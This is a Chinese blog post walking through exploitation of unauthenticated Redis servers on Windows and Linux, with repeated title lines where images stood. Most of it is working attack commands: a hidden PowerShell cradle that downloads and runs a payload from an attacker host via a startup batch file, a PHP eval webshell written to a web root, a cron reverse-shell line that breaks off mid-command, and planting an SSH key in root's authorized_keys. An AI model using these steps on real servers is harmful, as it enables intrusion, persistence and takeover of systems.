【漏洞复现】redis未授权访问windows+linux利用方法

windows利用方法

通过端口扫描扫描到靶机开放6379
【漏洞复现】redis未授权访问windows+linux利用方法

启动项

通过写入到windows启动项进行开机自启动提权
通过未授权访问进行连接,输入info查看是否连接成功
【漏洞复现】redis未授权访问windows+linux利用方法
成功以后搞一个cs监听
【漏洞复现】redis未授权访问windows+linux利用方法
生成一个powershell钓鱼命令
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:80/a’))”
通过redis未授权访问【漏洞复现】redis未授权访问windows+linux利用方法
设置写入文件
config set dbfilename 1.bat
【漏洞复现】redis未授权访问windows+linux利用方法
这里看了一下网上,发现复制的都是错的,后来发现"闭合问题使用注释之后才可正常写入能上线的powershell
set x “rnrnpowershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx/a’))”rnrn”
【漏洞复现】redis未授权访问windows+linux利用方法
save
【漏洞复现】redis未授权访问windows+linux利用方法
重启之后直接上线
【漏洞复现】redis未授权访问windows+linux利用方法

webshell写入

此处linux和windows一样就不在linux复现了
写入webshell
设置写入web路径
config set dir c:/phpstudy/www
【漏洞复现】redis未授权访问windows+linux利用方法
设置写入文件
config set dbfilename shell.php
【漏洞复现】redis未授权访问windows+linux利用方法
写入内容
set x “<php @eval($_POST[‘swzaq’]) ?>”
【漏洞复现】redis未授权访问windows+linux利用方法
save
【漏洞复现】redis未授权访问windows+linux利用方法
连接webshell
【漏洞复现】redis未授权访问windows+linux利用方法

linux利用方法

计划任务

获取info信息
【漏洞复现】redis未授权访问windows+linux利用方法
监听端口444
【漏洞复现】redis未授权访问windows+linux利用方法
执行如下命令大概一分钟内反弹shell
set xxx “nn*/1 * * * * /bin/bash -i>&/dev/【漏洞复现】redis未授权访问windows+linux利用方法

ssh公私钥

使用客户端生成私钥
ssh-keygen -t rsa
【漏洞复现】redis未授权访问windows+linux利用方法
将生成的公钥保存成1.txt
(echo -e “nn”; cat id_rsa.pub; echo -e “nn”) > 1.txt
【漏洞复现】redis未授权访问windows+linux利用方法

将保存的公钥1.txt写入redis
cat 1.txt | redis-cli -h 10.10.10.135 -x set cr【漏洞复现】redis未授权访问windows+linux利用方法
更改redis备份文件路径,设置上传文件名为authorized_keys
config set dir /root/.ssh
CONFIG SET dbfilename authorized_keys
save保存之后直接ssh -i id_rsa root@192.168.80.130登录
【漏洞复现】redis未授权访问windows+linux利用方法

版权声明:玥玥 发表于 2021-07-29 22:24:15。
转载请注明:【漏洞复现】redis未授权访问windows+linux利用方法 | 女黑客导航